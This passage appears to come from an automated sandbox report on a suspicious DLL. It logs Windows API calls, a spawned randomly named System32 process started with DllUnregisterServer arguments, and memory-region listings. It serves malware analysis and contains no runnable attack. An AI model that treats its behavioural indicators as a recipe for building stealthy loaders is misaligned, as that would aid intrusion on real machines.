"c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.895] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.895] CloseHandle (hObject=0x74) returned 1 [0031.895] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.895] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.895] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.897] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.897] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.897] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.897] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.897] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.897] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.897] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.897] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.898] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.899] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.899] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.899] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.899] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.899] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.899] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.899] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.899] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.899] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.900] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.900] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.900] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.900] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.900] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.900] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.900] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.900] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.901] HeapDestroy (hHeap=0x800000) returned 1 Process: id = "15" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f840" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 774 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 775 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 776 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 777 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 778 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 779 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 780 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 781 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 782 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 783 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 784 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 785 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 786 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 787 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 788 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 789 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 790 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 791 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 792 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 793 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 794 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 795 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 796 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 797 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 798 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 799 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 800 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 801 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 802 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 803 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 804 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 805 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 806 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 807 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 808 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 809 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 810 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 811 start_va = 0x1200000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 812 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 813 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 814 start_va = 0x1200000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 815 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Thread: id = 36 os_tid = 0xb08 [0031.936] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f64c | out: lpSystemTimeAsFileTime=0x16f64c*(dwLowDateTime=0xe0c2ac90, dwHighDateTime=0x1d3dfba)) [0031.936] GetCurrentProcessId () returned 0xb04 [0031.936] GetCurrentThreadId () returned 0xb08 [0031.936] GetTickCount () returned 0x17251 [0031.936] QueryPerformanceCounter (in: lpPerformanceCount=0x16f644 | out: lpPerformanceCount=0x16f644*=362051840) returned 1 [0031.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.937] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.938] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.939] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.939] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.939] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.939] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.939] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.939] GetCurrentThreadId () returned 0xb08 [0031.939] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"0\"" [0031.939] GetEnvironmentStringsW () returned 0x2478f0* [0031.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13c09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.939] FreeEnvironmentStringsW (penv=0x2478f0) returned 1 [0031.939] GetStartupInfoA (in: lpStartupInfo=0x16f59c | out: lpStartupInfo=0x16f59c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.940] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.940] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.940] SetHandleCount (uNumber=0x20) returned 0x20 [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] GetACP () returned 0x4e4 [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.940] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f57c | out: lpCPInfo=0x16f57c) returned 1 [0031.940] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f048 | out: lpCPInfo=0x16f048) returned 1 [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16efd8 | out: lpCharType=0x16efd8) returned 1 [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x16edc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0031.940] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x16f05c | out: lpCharType=0x16f05c) returned 1 [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x16ed98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.940] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.940] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16eb88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.940] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f35c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 